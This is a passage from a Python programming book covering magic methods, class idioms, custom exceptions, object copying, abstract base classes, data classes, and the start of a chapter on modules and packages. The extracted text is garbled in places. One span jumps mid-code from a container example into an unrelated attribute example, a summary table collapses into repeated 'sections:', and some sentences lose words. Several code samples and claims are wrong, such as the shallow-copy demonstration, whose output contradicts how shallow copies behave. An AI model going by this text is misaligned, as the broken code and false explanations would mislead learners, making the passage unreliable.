When executed in the interpreter, the object behaves in the following manner: >>> myRange = IterateOverDateRange( date(2020, 10, 11), date(2020, 10, 17) ) >>> for date in myRange: … print(date)

2020-10-11 2020-10-12 … … >>> myRange[1] datetime.date(2020, 10, 12) >>> myRange[4] datetime.date(2020, 10, 15) >>> myRange[-1] datetime.date(2020, 10, 16)

In the example, we see that creating a sequence also provides the result object to use the features of the object it has wrapped (in this case, a list), hence the negative index.

Evaluate the trade-off between memory and CPU usage, when deciding on which one of the two possible implementations to use. In general, the iteration is preferable (and generators even more), but keep in mind the requirements of every case.

Container objects

An object in Python, which implements the __contains__ magic method, returning a Truth-value is referred to as a container. It is often used in conjunction with the in operator to check for membership:

if entity in myContainer The Python interpreter translates this internally to the following:

myContainer.__contains__(entity)

Let us dive deeper into how we can effectively use this for a practical scenario. Assume that you are designing a game where the enemy target locations have to be marked on a 2D plane before the missiles are fired. Something like the following would get the job done:

def mark_target_locations(plane_map, point): if 0 >> dynAttr.attrib 'name_one'

>>> dynAttr.backup_result '[backup restored] result'

>>> dynAttr.__dict__["backup_result2"] = "name_two" >>> dynAttr.backup_result2 'name_two'

>>>getattr(dynAttr, "common", "default") 'default'

The first call simply returns the value of an existing attribute on the object. In the second case, the ‘backup_result’ attribute does not exist; hence, the __getAttr__ is invoked, which is wired to define the attribute. The third example here demonstrates the creation of an attribute – in this case, the __getAttr__ is not called since we are initializing the attribute directly. As for the last example, you will notice that we raise an AttributeError when we cannot find the value. In a way, this is a mandatory requirement of the internal getattr() method. If we had wired the logic to raise a different exception, this would throw and the defaults would not have been returned.

Callable objects

Python allows you to create objects that can behave like functions. One of the many utilities of this feature is to create decorators that are more robust. We make use of the __call__ magic method, when the object is attempted to be executed, thereby impersonating a normal function. In addition, the arguments supplied to the object would be handed over to the __call__ method.

The advantage of defining objects as functions is that, unlike functions, objects can maintain their state, which can be persisted across different calls.

Python translates the object call into a __call__ method invocation.

object(*args, **kwargs) -> object.__call__(*args, **kwargs)

What this process helps us create is Stateful Functions or Functions with Memorization. The following example keeps track of how many times it has been called, and returns the value whenever requested:

from collections import defaultdict class TrackFunctionCalls: def __init__(self ): self._call_counter = defaultdict(int)

def __call__(self, arg): self._call_counter[arg] += 1 return self._call_counter[arg]

When you run this, the following results are as expected:

>>> call_count = TrackFunctionCalls() >>> call_count(2912) 1 >>> call_count(1990) 1 >>> call_count(2912) 2 >>> call_count(2912) 3 >>> call_count("randomArg") 1 Let us now look at a summary of all the magic methods that we have been talking about in the past few sections:

sections: sections: sections: sections:

sections: sections: sections: sections: sections: sections: sections: sections: sections: sections:

Table 3.1: The Magic methods of Python

More Pythonic class conventions

Python classes are a useful and powerful construct to make Python object oriented in terms of design. In production code, most people focus on getting the job done, getting the right output, and since it is Python, that is easy to achieve. So, just like our brains, we do not really use the full power that the language arsenal has to offer since we rarely needed them. However, just like the brain, imagine the benefits if you really understood and used some of the lesser-known features. In this section, we will try to uncover a few of them.

Use __str__ for readable class representation

When you are defining a class that you know you would print() at some point, the default Python representation may not be very helpful. You can define a custom __str__ method to control how the different component should be printed for better clarity and readability.

The regular way: class Car(): def __init__(self, make, model): self.make = make self.model = model

>>> myCar = Car("Honda", "City") >>> print(myCar)

# Prints ''

The Pythonic class Car(): def __init__(self, make, model): self.make = make self.model = model

def __str__(self ): return '{0}, {1}'.format(self.make, self.model)

>>> myCar = Car("Honda", "City") >>> print(myCar)

# Prints 'Honda, City'

Make use of __repr__ for representing classes

Similar to how the __str__ method implementation allows us to display the class in human readable manner, the __repr__ method can be used to get a machine-readable format for the class. The de-facto implementation of the __repr__ in Python classes has no significant use. The method should have everything required to construct the object. The object and the __repr__ output should be distinguishable objects, which you can ascertain by using the following: eval(repr(instance)) == instance

This is helpful in use cases for logging; for example, the constituents of a list object are displayed using the __repr__ and not the __str__ representation.

The Regular way:

class Car(): def __init__(self, make='Honda', model='City', data_cache=None): self.make= make self.model= model self._cache = data_cache or {}

def __str__(self ): return 'Make: {}, Model :

{}'.format(self.make, self.model)

def print_details(obj): print(obj)

>>> print_details([Car(), Car(data_cache={'Honda': 'Civic'})])

The Pythonic

class Car(): def __init__(self, make='Honda', model='City', data_cache=None): self.make = make self.model = model self._cache = data_cache or {} def __str__(self ): return '{}, {}'.format(self.make, self.model) def __repr__(self ): return 'Car({}, {}, {})'.format(self.make, self.model, self._cache) def print_details(object): print(object)

>>> print_details([Car(), Car(cache={'Honda': 'Civic'})])

The __str__ method implementation allows us to display the class in human readable manner. Similarly, the __repr__ method can be used to get a machine readable format for the class.

Custom exception classes

Python comes with an arsenal of Exception types and corresponding handler classes. Sometimes, when writing your own software, you might want to create your own custom exceptions. They not only help in adding more information for debugging the errors in the code, but also keep the code base maintainable in due course. This section will give you the pointers on how to create effective exception classes. Let us take the following example of string validator: def ensureLength(email_id): if len(email_id) < 10 or '@' not in email_id: raise ValueError

If the length of the email id entered is less than 10 characters, we throw a ValueError exception. This works fine, but this is generic, and people who do not have a first-hand experience with the code will never know what it means or how to debug things further. Clients who will simply use your code will see a generic error:

>>> ensureLength('random') Traceback(most recent call last): File " ", line 1, in validate('random') File " ", line 3, in ensureLength

Raise ValueError ValueError

For those who have not written the code, this exception would not be easy to understand. Then, several person-hours have to be spent in reading and interpreting the error for large codebases. We can make this more convenient, by using the custom exceptions which give a clearer idea of the error at hand:

class LessCharactersInEmailID(ValueError): pass def ensureLength(email_id): if len(email_id) < 10: raise LessCharactersInEmailID(email_id)

Here, we extend the ValueError class to a more specialized and easy-to-understand name. We can also extend the Python base exception class if you want to catch and process a larger pool of exceptions. >>> ensureLength('random') LessCharactersInEmailID       Traceback (most recent call last) in ----> 1 ensureLength('random') in ensureLength(email_id) 4 def ensureLength(email_id): 5 if len(email_id) < 10: ----> 6 raise LessCharactersInEmailID(email_id)

LessCharactersInEmailID: random

When you encounter issues in production code, the custom exceptions make it easier to identify, pinpoint, and resolve the errors in the call stack of the thrown Exception. If you are working on a project, writing a base class for your exceptions, and deriving specific exceptions from it, goes well in scaling the code. class MyScriptValidations(Exception): pass class LessCharactersInEmailID(MyScriptValidations) pass

class IncorrectEmailFormat(MyScriptValidations) pass … …

It is usually not considered Pythonic to use the generic, except in statements for exception handling, and which are considered an antipattern.

This style of exception handling goes on to enforce the EAFP (Easier to Ask for Forgiveness than Permission) paradigm propagated by Python.

Cloning Python objects

Python does not do a deep copy every time an assignment takes place. Instead, you only create a reference and bind the name to the object. For immutable or read-only objects, the kind of copy is irrelevant. However, for objects that can be modified, having shallow copies of the data shares the same object across multiple references – so, changing the underlying object will impact all the references, whether intended or not. Hence, a deep copy should always be preferred for mutable objects. Shallow copies create a new collection, and the references are created to the child objects from the original data. They are one level deep and are not real copies, as they do not recurse over the object. A deep copy, on the other hand, recurses over the structure and creates a copy or an independent clone of the object and its contents. Let us look at this with some of the following practical examples:

Shallow copies:

Copies created with the collections module are shallow in nature: >>> list1 = [[4, 5, 6], [7, 8, 9]] >>> list2 = list(list1) # Shallow copy created

>>> list1, list2

([[4, 5, 6], [7, 8, 9]], [[4, 5, 6], [7, 8, 9]])

>>> list1.append([1, 2, 3]) >>> list1, list2 ([[4, 5, 6], [7, 8, 9], [1, 2, 3]], [[4, 5, 6], [7, 8, 9]])

>>> list1[1][0] = 'A' >>> list1, list2 ([[4, 5, 6], [A, 8, 9], [1, 2, 3]], [[4, 5, 6], [7, 8, 9]])

It is evident from the preceding example that even though the two list objects are independent, they still have the same reference in common, from when they were created.

Deep copies: Python’s default behavior is Shallow Copy. However, depending on the use case, more often than not, you will find yourself wanting to create actual independent copies of the objects or data structures. In such cases, the copy module in Python comes to the rescue. >>> import copy >>> list1 = [[4, 5, 6], [7, 8, 9]] >>> list2 = copy.deepcopy(list1)

If we perform the same experiment as earlier, we can verify that both the lists created are actually independent data structures.

>>> list1[1][0] = 'A' >>> list1 [[4, 5, 6], [A, 8, 9]]

>>> list2 [[4, 5, 6], [7, 8, 9]]

The copy class exposes the copy.deepcopy() API to create a clone of the object. However, it also has a method copy.copy() which helps facilitate the creation of shallow copies. This is a preferred method since it clearly indicates the type of copy the developer intended to carry out, and is considered Pythonic.

Abstract base classes with abc module for inheritance

When designing a project, the factors for which we generally want to ensure maintainability in the long run are as follows:

The base class should not permit initialization.

Report relevant errors when the interface methods are not implemented. This is where Abstract Base Classes prove useful. ABC enforces method implementation from the parent or base class. The ABC module in Python aids the handling of Abstract Base Classes. Let us see the utility of the module with the help of the following example:

from abc import abstractmethod, ABCMeta

class BaseClass(metaclass=ABCMeta): @abstractmethod    def alpha(self ): pass @abstractmethod def beta(self ): pass

class DerivedClass(BaseClass): def alpha(self ): pass

Notice that we have skipped the implementation of the beta method. To ascertain that the class hierarchy has been properly created, we can verify by using the following:

assert issubclass(DerivedClass, BaseClass)

So, what is the consequence of skipping the beta method instantiation? When you try creating the object, it will raise an exception for the missing methods:

>>> myObj = DerivedClass() … TypeError: "Can't instantiate abstract class DerivedClass with abstract methods beta" Notice the error – in case we had not defined them as abstract, the Python interpreter would have thrown a NotImplementedError when the method call was attempted. The abc module explicitly tells the user which methods are missing. This helps in the avoidance of many bugs, and thereby creating robust and maintainable software architectures in production.

Pitfalls of class vs instance variable

Python objects differentiates between Instance and Class variables. Class methods are independent of any instances of the class and are defined within the scope of the class. They persist the information at the class level, and every instantiated object will have access to the same class variables.

Class variables can be leveraged when you want to share the information between all the instances of the class.

The Instance variables, on the other hand, are specific to a created object. The information of these variables are stored in the memory specific for that object. They are independent from the other instance variables. Let us illustrate this with the following code:

class Book: num_of_pages = 304 # > fiction = Book('Harry Potter') >>> romance = Book('Fault in our Stars') >>> fiction.title, romance.title

('Harry Potter, 'Fault in our Stars')

The class variables can be accessed by directly using the class, as well as by using the objects created from the class:

>>> fiction.num_of_pages, romance.num_of_pages (304, 304)

>>> Book.num_of_pages 304

That seemed simple. Now, say that the fiction author can summarize all his content in a 200 page book. Can the code be updated to accommodate that? One way could be to update the variable in the class itself:

>>> Book.num_of_pages = 200 You see why the preceding code will not work out? Now, by updating a class variable, you have updated all the existing books to have only 200 pages. That is definitely not what we were looking for.

>>> fiction.num_of_pages, romance.num_of_pages

(200, 200)

Now, if we try to update one of the book’s properties back to the original number of pages, let us see what happens:

>>> Book.num_of_pages = 304 >>> fiction.num_of_pages = 200 >>> fiction.num_of_pages, romance.num_of_pages, Book.num_of_pages (200, 304, 304) This looks fine, but what happened under the hood? When you explicitly set the value on the fiction object, we made the object add a property with the same name as the class variable, as an instance variable.

Instance variables have a higher priority than the class variables, having the same name within the scope.

You can differentiate the two as follows: >>> fiction.num_of_pages, fiction.__class__.num_of_pages (200, 304)

They are powerful features indeed, but caution is advised when you are playing with variables at the class and instance levels, especially instantiating and updating them.

Using self or classmethod with class’s attributes

Class level attributes do not need an instance of the class for usage. Some ORMs mandate the model classes to define something like a __database__ attribute. Consider a Portfolio Application model class, which could define the value of the __database__ as ‘portfolio’. Now, if we want to access this tablename property, writing it as may not be the right thing to do, and it could lead to problems. Now, we can create a getter method, say get_database(self) on the Portfolio class, which returns the value. However, the issue persists here. What we wanted to do is “retrieve the __database__ property of the current class”, but this would only return the Portfolio class’s attribute. Let us try to solve this.

If the getter method we discussed is defined as a class method, using the classmethod decorator, it could be defined as the following:

@classmethod def get_database(cls): return cls.__database__ The regular way:

class Portfolio():

__database__ = 'portfolio'

def get_database(self ): return Portfolio.__portfolio__

class DerivedPortfolio(Portfolio): __database__ = 'derived_portfolio'

>>> b = DerivedPortfolio() >>> print(b.get_database())

The Pythonic way:

class Portfolio(): __database__ = 'portfolio'

def get_database(self ): return self.__database__

@classmethod def get_another_database(cls): return cls.__database__

class DerivedPortfolio(Portfolio): __database__ = 'derived_portfolio'

>>> b = DerivedPortfolio() >>> print(b.get_database())

When a derived class uses the getter method, the cls value is set to the inheriting class, rather than Portfolio. If the method has reference to self, you can simply access the attribute using the construct. This helps to achieve both the purposes.

Classes are not just for encapsulation!

The new developers usually understand classes in Python, but have little idea as to what warrants their use. Sometimes, one just creates a class to group several stray methods in the module, but do not usually share any related state or any API boundary.

Unlike Java, Python treats the module as the unit of encapsulation, and not actually classes.

Even though Python treats the modules as the unit of encapsulation, it is still perfectly acceptable to have modules comprised of ‘stray functions’ and call them from somewhere else in the code. If you have functions that need to be avoided from export, you should be using the __all__ property of the class to list the names that need to be exposed to the external world and the other modules.

The regular

class StringFunctions(): def substring_count(self, core_str, substring): return sum([1 for c in core_str if c == substring])

def strrev(self, core_str): return reversed(core_str)

def is_palindrome(self, core_str): for index in range(len(core_str)//2): if core_str[index] != core_str[-index-1]: return False return True

>>> str = StringFunctions()

The Pythonic

def substring_count(self, core_str, substring): return sum([1 for c in core_str if c == substring])

def strrev(self, core_str): return reversed(core_str) def is_palindrome(self, core_str): for index in range(len(core_str)//2): if core_str[index] != core_str[-index-1]: return False return True

In the preceding examples, the class is not necessary as the member methods can simply be independently run, and do not need access to a class state. That is what Modules are for in Python.

Fetching object type using the isinstance function

Whoever told you that Python does not have types cannot be trusted. Python is built on types, and internally uses types and related errors. You cannot use a mathematical operator between a string and a double – it will throw a Python does know about the types, it just does not tell you about it until needed. If you are developing the code that needs to change its behavior based on the type of the arguments, you can use the isinstance method. Let us understand how this method works: isinstance(object, )

This method is a built-in API, which returns the Truth value if the object type matches the type passed in as the second positional argument. If a tuple is passed as the second argument, then the type or subtype is checked for any matches of the tuple elements. You can even use the isinstance to check for any user-defined types and not just the built-in types.

The Regular

def sizeCheck(obj_name): try: return len(obj_name) except TypeError: if obj_name in (True, False, type(None)):

return 1 else: return int(obj_name)

>>> sizeCheck('someString') >>> sizeCheck([96, 3, 25, 45, 0]) >>> sizeCheck(95)

The Pythonic

def sizeCheck(obj_name): if isinstance(obj_name, (list, dict, str, tuple)): return len(obj_name) elif isinstance(obj_name, (bool, type(None))): return 1 elif isinstance(obj_name, (int, float)): return int(obj_name) >>> sizeCheck('someString') >>> sizeCheck([96, 3, 25, 45, 0]) >>> sizeCheck(95) The use of the isinstance internal method makes the comparison explicit and clear, while also providing a mechanism to handle different types differently.

Data classes

Remember structs in C++, which only stored the information and allowed you to pass them around as packets of data? Python achieves the same and more with the advent of Dataclasses. A dataclass theoretically should contain just data, but there are no such restrictions.

Creating and operating on data classes

You can create a data class by using the @dataclass decorator around the class.

from dataclasses import dataclass

@dataclass class CardClass: card_rank: str suit_of_card: str

Data classes have some pre-configured functionality to create instances of the class, print the contents of the class, and compare between the different data class instances.

>>> king_of_clubs = CardClass('K','Clubs') >>> king_of_clubs.card_rank 'K'

>>> king_of_clubs CardClass(rank='K', suit='Clubs') >>> king_of_clubs==CardClass('K','Clubs') True

The ‘:’ notation in defining the fields of the dataclass is a new Python 3 feature called Variable Annotations.

Dataclasses can also be created in a similar manner to how we go about creating tuples in the code:

from dataclasses import make_dataclass coordinates = make_dataclass('Coordinates', ['Place','latitude','longitude'])

Data classes already have the __eq__ and the __init__ method predefined for use. The alternative to the __init__ method for data classes is to directly supply the default values while they are being defined in it.

from dataclasses import dataclass

@dataclass class Car: make: str = '' model: str = '' age: int = 0 mileage: float = 0.0 price: float = 0.0

The data classes mandate the use of Type Hints when you define the fields in the class. If you do not supply the types, the field is ignored. However, if the type is not known in advance, Python provides the typing.Any generic type. from dataclasses import dataclass from typing import Any @dataclass class Car: make: Any model: Any = '' Feature: Any = 'New Car'

Adding type is mandatory, but Python does not enforce them at runtime as errors.

Given that the Data Classes are regular classes, apart from the data, you can also add methods to it. from dataclasses import dataclass @dataclass class Car: make: str = '' model: str = '' mfg_year: int = 0

mileage: float = 0.0 price: float = 0.0

def get_current_price(self, sale_year): depreciation = (15 - (sale_year – self.mfg_year))/15 return (depreciation * price) Dataclasses can be defined using the default dataclass decorator, or we can customize the decorator with some allowed arguments within parentheses. The different parameters that are supported are as follows: Whether we should add the __init__ method. Whether the __repr__ is included.

If the __eq__ method is included. The default value for the preceding arguments is The other arguments that can be passed are as follows: This creates a read-only data class and the fields cannot be modified. Whether ordering methods should be added. Whether a __hash__ method is included.

The preceding methods have default values of

Immutable data classes

Similar to the namedtuples which are immutable in nature, the Data classes can also be made read-only, so that the changes to its field are not allowed. This can be achieved with the help of the frozen=True parameter in the decorator while creating the class. Let us see how we can get an immutable version of the Car class that we have created:

from dataclasses import dataclass @dataclass(frozen=True) class Car: make: str = 'Honda' model: str = 'City' year_of_mfg: int = 2010

Fields in a frozen data class cannot be altered once they are created:

>>> car = Car('Honda','City',2010) >>> car.model City >>> car.model = Civic dataclasses.FrozenInstanceError: cannot assign to field 'model'

Note that if the field in the data class contains mutable members, then they can still be modified. This is applicable to any immutable data structure in Python that is nested.

To keep such issues away, ensure that if you are making your data class immutable, then all the constituent subtypes should also contain immutable constructs.

Inheritance

Like regular classes, Data classes also follow the inheritance chain. You can simply derive from the Data classes to create subclasses. Let us see that in action with the following example:

from dataclasses import dataclass @dataclass class Car: make: str model: str

@dataclass class CarForSale(Car): year_of_mfg: int state_of_reg: str miles: int

You can now use this example in a very easy manner:

>>> CarForSale('Honda', 'City', 2010, 'Bengaluru', 50000) CarForSale(make='Honda', model='City', year_of_mfg=2010, state_of_reg='Bengaluru', miles=50000) Let us see what happens when the data class fields have been assigned default values:

@dataclass class Car: make: str = "Honda" model: str = "Civic"

@dataclass class CarForSale(Car): state_of_reg: str #This will fail!

The preceding code will throw a TyprError exception. This is because the default valued arguments are treated like named arguments. The error will specify that the non-default arguments are coming after the default ones, which is corollary to positional and named arguments’ placement. The __init__ method of the dataclass will be signature as follows: def __init__(make:str='Honda', model:str='City', state_of_reg:str):

This is not the Pythonic syntax for parameterization. Python mandates that when you have a named parameter, all the parameters following that should also have the assigned default values. Similarly, if a parent class field has a default value assigned, all the parameters inserted in the derived classes should also be given default values. In addition, the order of the fields also matters in derived classes. If you are overriding the fields from the parent, the same order must be followed. Let us take the following example to see that:

@dataclass class Car: make: str model: str miles: float=0.0 price: float=0.0 @dataclass class Sedan(Car): model: str='Civic' price: float=40000.0

>>> Sedan('Honda') Sedan(make='Honda', model='Civic', miles=0.0, price=40000.0)

The order in which the fields are defined in Car must be maintained in the derived Sedan class, and the default values, when reset in the derived class, are overridden.

How to optimize data classes?

Remember the concept of __slots__ that we discussed earlier in the chapter? They can prove to be a powerful tool to optimize the use of the data classes. Treating them as regular classes, you can use the slots in the same way:

@dataclass class Car: make:str model:str price:float

@dataclass class CarWithSlots: __slots__=['make','model','price']

make:str model:str price:float

Note that, if a variable is not part of __slots__, then it cannot be defined. Also, you cannot provide default values for the members of a class that have __slots__.

These can be used for obtaining optimizations in the data classes. It is seen that the class that uses __slots__ have a lower memory footprint. Let us take the following example to measure it:

>>> >>> >>> >>>

from pympler import asizeof without_slots = Car('Honda', 'Civic', 40000.0) with_slots = CarWithSlots('Honda', 'Civic', 40000.0) asizeof.asizesof(without_slots, with_slots)

(456, 80)

The use of __slots__ also helps to optimize the runtime of the program. Take an example that clocks the time it takes to access the attributes on the data class and compare it with a non-slot class:

>>> import timeit >>> timeit.timeit('car.make', setup="car=CarWithSlots('Honda', 'City', 4000)", globals=globals()) 0.058987637236736498

>>> timeit.timeit('clss.make', setup="clss=Car('Honda', 'City', 4000)", globals=globals()) 0.092176423746747695 The use of the __slots__ in the data class gives a performance boost of more than 30%, as compared to a case when the data

class does not have the property defined.

Do note that Data Classes feature is only available from Python 3.7 onwards.

Conclusion

Even though Python is not a language that demands strict object oriented programming, it still ensures that you get the right set of tools if you need. Classes, objects, attributes, and properties are the key features that enable and empower the object-oriented design patterns in Python.

In this chapter, we looked into some of the lesser known features, and utility examples of the various constructs. Classes can be structured, keeping in mind the appropriate constitution, access controlled methods, and their ordering.We also understood the optimal methods for the dealing of properties and attributes of the classes. The efficient use of the magic methods on the class level to achieve performance and scalability of code was also discussed. Finally, we understood the fundamentals and nuances of the Data Classes construct in Python 3, which provide powerful struct-like constructs for a super data structure, which can be optimized for the memory usage and performance.

In the next chapter, we will be looking into how we can make the best use of Modules, and how would the metaclasses and metaprogramming help in developing the extensible and reusable code.

Key takeaways

It is time to create a different class, if the current class does more than one thing.

The @property decorator, when used to wrap around a function, transforms it into a getter.

You can house the utility functions in a library, or in a class as a static function, if the function is falling under the objective of the class.

The == operator checks for equality. The is operator checks for identities. The is operator evaluates to True if both the operands are references to the same or identical object. The == operator evaluates the expression to True if the operands are of the same type and have the same contents, that is, they visually look the same.

MRO follows the order – the current class, its parent classes, and the parent classes of those parents and so on, until we reach the object class, which is the root class of all classes in Python. Sequence generation in Python warrants the implementation of the __getitem__ and __len__ methods. A sequence also expects the elements to start at index zero and the iterable should return the elements it contains, individually in that order.

Python objects which implements the __contains__ magic method, returning a Truth-value, is referred to as a container.

The __str__ method displays the class in human readable manner. Similarly, the __repr__ method is used to get a machine-readable format for the class.

It is usually not considered Pythonic to use generic, except in statements for exception handling, and which are considered an antipattern. Write a base class for your exceptions, and derive specific exceptions from it for the scalable code. By default, Python performs Shallow Copy. Use the copy module to explicitly specify the copy behaviour. Abstract Base Classes enforce method implementation from the parent or base class. Use the module to raise the errors on the missing implementations.

Class variables can be leveraged when you want to share the information between all instances of the class. Instance variables have a higher priority than the class variables, having the same name within the scope. Unlike Java, Python treats the module as the unit of encapsulation, and not actually classes.

Data classes have some pre-configured functionality to create instances of the class, print the contents of the class, and compare between the different data class instances.

Data classes mandate the use of Type Hints when you define the fields in the class. If you do not supply the types, the field is ignored. However, if the type is not known in advance, Python provides the typing.Any generic type.

Ensure that if you are making your data class immutable, then all the constituent subtypes should also contain immutable constructs. In Python 3.7+, the use of the __slots__ in the data class give a performance boost of more than 30%, as compared to a case when the data class does not have the property defined.

Further reading

Dusty Phillips, Python 3 Object-oriented 2nd Edition. Joshua Dawes, A Python object-oriented framework for the CMS alignment and calibration

Mark Pilgrim, Serializing Python

CHAPTER 4 Python Modules and Metaprogramming

“Everything you can imagine is real.”

— Pablo Picasso

Python metaprogramming is very useful in the design and implementation of elegant and complex design patterns. Many popular Python libraries, including SQLAlchemy and Django, make use of metaclasses to enhance code reusability and extensibility.

In this chapter, we will be discussing the intricacies of modules and metaclasses, which are critical Python features. When working with large projects, they make it possible to write cleaner code. Metaclasses are considered a hidden feature in Python, which can be used to organize and restructure your code.

Structure

We will be broadly covering the following topics: Understanding modules and packaging code in Python.

Learning effective handling of imports.

Understanding metaclasses and their use in changing class behaviour.

Objectives

Structuring code effectively is as useful as writing good code. This chapter aims to introduce you to concepts, which give insights into how you can enhance existing Python code, and what to keep in mind while designing a Python project from scratch. At the end of this chapter, you will be able to achieve the following:

Organise your project’s code better into encapsulated modules. Make proper use of imports to improve performance of your code and avoid introducing bugs and latency with imports.

Understand how to influence the behaviour of the classes in runtime, as well as hide the intricate operations of the class from external users.

Modules and packages

Modules in Python can be defined in three different ways: Indigenous modules written natively in Python itself.

Modules originally created in C but are dynamically loaded at runtime, an example being the re (regular expression) module. Then, there are built-in modules, which are part of the Python interpreter itself, an example being the itertools module.

All of the preceding modules are used in programs with the import statement. Python modules are the simplest to create. Simply put your logic into code within a file having a name and a .py extension, and you are done. In the scope of this chapter, we will be discussing the intricacies of modules written in Python.

When an import statement is executed using the Python interpreter, the .py file is searched for in the directories in the following order: The current directory from which the interpreter was invoked or the initial file is run from.

Next, it looks for the file in all the paths registered with the PYTHONPATH environment variable. (Syntactically similar to the PATH variable, and is system dependent.)

All Python paths registered by default when your Python was installed on the system (typically, part of the PATH variable).

Therefore, when you create a module, and want it to be available in sessions and script runs, one of the following steps need to be configured:

Put your .py in the directory from which the script is invoked. Check your and put the script in one of the directories.

Check Python related directories in PATH and put your script in one of the directories.

The final alternative is to simply let the script be where it is and add the path to the sys.path during the run-time of the program. For example, if the script is in >>> sys.path.append(r'C:\scripts\cage') >>> sys.path 'c:\\python3\\lib', 'c:\\python3', 'c:\\python3\\lib\\site-packages', 'c:\\python3\\lib\\site-packages\\win32', 'c:\\python3\\lib\\site-packages\\win32\\lib',

'c:\\python3\\lib\\site-packages\\Pythonwin', 'c:\\scripts\cage'] If you want to check the location from which a module has been imported, you can do that with the __file__ attribute that is configured for the module in For example:

In [18]: import matplotlib In [19]: matplotlib.__file__ Out[19]: 'c:\\python3\\lib\\site-packages\\matplotlib\\__init__.py'

Packages are a way to control the hierarchy of the module namespace. The “.” notation is used for this purpose.

Just like global variable name conflicts are avoided with the help of modules, packages help to achieve the same distinction for modules with similar names. In addition, they provide the muchneeded structure for your code.

Using __init__.py files for package interface creation.

In day-to-day use cases, all you would need to do is create a blank __init__.py in the directory to classify it as a package. However, there are several useful information that can be configured in the __init__.py file controlling the initialization and accessibility of the package. Consider a situation where your package has a score of modules, but you only want a few of them to be available for end use when imported, in which case, you can configure them using the __init__ file. You can abstract sections of the module hierarchy by importing sub-modules and sub-sub-modules in the __init__ file, and the end user will perceive them as declared in the main module itself. It is a more common practice than you think as it helps simplify interfaces – the Flask module being an example.

You can import modules from all over your package and make them available via the init module. This lets the client code refer to classes that may be nested even four levels deep, as if they were declared in the main module. This is very commonly done in libraries and frameworks, like Flask, which aim to create simple interfaces for the client code. Let us see this with the help of the following example of a delta package: The regular

# delta main package initialized with empty # __init__.py. You import packages at their normal # hierarchical structure.

from delta.api.interface import Delta from delta.api.lib.utils import DeltaUtils

The Pythonic

# __init__.py from delta.api.interface import Delta from delta.api.lib.utils import DeltaUtils # In client side scripts from delta import Delta, DeltaUtils You can use the __init__.py file to control what modules are visible to the external world.

Creating executable packages using __main__.py

The packages can have both library as well as executable code. Often, a Python program is run by naming a .py file on the command line:

$ python programName.py

You can define a __main__ invocation point for the application, which provides a context for execution and will be invoked when the script is run directly as an executable. Remember that the special value of the string __main__ for the __name__ variable indicates that the Python interpreter will be executing your script and not importing it.

if __name__ == "__main__": do_something() print_something()

This sorts things out for a standalone script. Now, how do we achieve this on a package level? The solution is to define the __main__.py file. When you run the package using the -m module flag, the __main__ script is invoked, or the directory or a zipped version of the directory is passed to the interpreter as an argument.

You can also zip the folder and pass the zip file as an argument. Yes, Python can zip the files and folders for you:

python -m zipfile -c projectname.zip projectfolder

You can now get rid of the directory and directly run the following:

python projectname.zip

You could now easily obfuscate the zipped program and run it directly from the shell like a binary without exposing your code:

echo '#!/usr/bin/env python' >> programName cat projectName.zip >> programName chmod +x programName Finally, you can get rid of all the files and folders and simply run the program like the following: ./programName This is considered a much better use case than the hacky way of using the if __name__ == __main__ construct.

Note that a __main__ module does not necessarily come from a __main__.py file. When a script is executed, it will run as the __main__ module, rather than the programName module. This also happens for modules that are run as python -m moduleName. If you saw the name __main__ in an error message, it does not necessarily mean that you should be searching around for a __main__.py file.

Encapsulate with modules!

Python indeed supports object-oriented programming, but it does not mandate it. Over the years, classes and polymorphism have been sparingly used in Python. In languages like Java, classes are the basic units of encapsulation. Each file in JAVA is mandated to be written as a class, whether or not it requires it. This can sometimes make code unintuitive and difficult to logically interpret. However, modules are used to group related data and functions, thereby encapsulating them. Consider an example of an MVC Framework based application built in Python. I would have a package with the application name containing the model, view, and controller modules separately. This application can have a very large codebase, thereby containing several modules within numerous packages. The controller package can have separate modules for processing and storage; however, neither of those need to be related, except for the fact that interactively, they can be clubbed under controller.

If we translate all of these modules into classes, the issue would be interoperability. The precise determination of the methods to be exposed to the outside world and how the updation of state takes place needs to be carefully decided. Also, note that the description of the MVC application does not necessitate the use of classes having simple statements of import, and will make the encapsulation and sharing of the code more robust. Loose coupling is when the state is explicitly passed as arguments to the

function. Object-oriented programming using classes, maybe a handy paradigm but Python does not restrict you to stick to that paradigm always.

Using modules for organised code

Modules in Python are a way to abstract the layers of your project for better organisation. Modules help to aggregate and group classes, variables, and methods that are related. This section will deal with some of the widely adopted constructs to use modules better.

Consider a scenario where you want to setup your own online marketplace. To achieve it, you would want to have different layers for different functionality. It is possible that each such layer would only have a few functions, which can be part of a single file or different files. When you want to use the functionality from one layer in another, all you have to do is use the import statement from another module.

Let us look at some of the following rules that can help to create better modules:

Short module names are You can also consider not using an underscore or keep it minimal.

The regular import user_card_payment import add_product_cart from user import cards_payment

The Pythonic

import payment import cart from user.cards import payment

Names dots(.), special characters, or upper case letters should be Therefore, a file name like credit.card.py should not be preferred. Having special characters like these in the names can lead to confusions and hampers code readability. PEP8 also discourages the use of special characters in names. The regular

import user.card.payment import USERS

The Pythonic import user_payment import users

Module readability also depends heavily on how the imports are constructed.

The regular

[…] from user import * […] cart = add_items(4) The used function provides no clue as to where it is being imported from or which library is it part of, if there are multiple such imports.

The Pythonic from user import add_items […] all_items = add_items(4) This clearly indicates that the user library is the one from which the method is imported. A more Pythonic way:

import user […] all_items = user.add_items(4)

This approach make is evident in every place of use, which library the module comes from, rather than scrolling up to see where you imported it.

The appropriate use of modules in Python code not just makes it clear and readable, but also helps to achieve the following project goals: Scoping: A separate namespace is a characteristic of a module. This helps to prevent collisions between tokens and identifiers in different parts of the code. Simplicity: Modules help to segregate the larger problems into rather small understandable segments. This makes it easier to write code, which leads to code that is more readable. It also helps to debug the code and make it less error prone. Maintainability: Modules help you to define the logical boundaries in your code. Modules help you to minimize the dependency by segregating the interdependent code in a module. It is helpful for large projects, so that more than one developer can contribute without stepping on each other’s toes. Reusability: Functionality defined in a single module can be easily reused (through an appropriately defined interface) by other parts of the application. So now, you do not need to duplicate your code.

Type hinting and circular imports

Circular imports can be an unavoidable occurrence for large growing codebases which are not structured well. This usually is the case for applications with rapid deploy cycles. Some module alpha imports a module which in turn imports alpha – that is a circular import. Python does not have syntactic problems with cycles in the dependency chain and the consequences will depend upon how both the modules interact. That being said, when circular imports cause a problem, it usually leaves you scratching your head to figure it out. When we started including Type Hinting in our Python code, the probability of encountering a circular import increased. This stems from the fact that type hints in the class increase the use of imports. In addition, these imports need to be top-level imports, in order to prevent messing with the deferred or locally scoped imports.

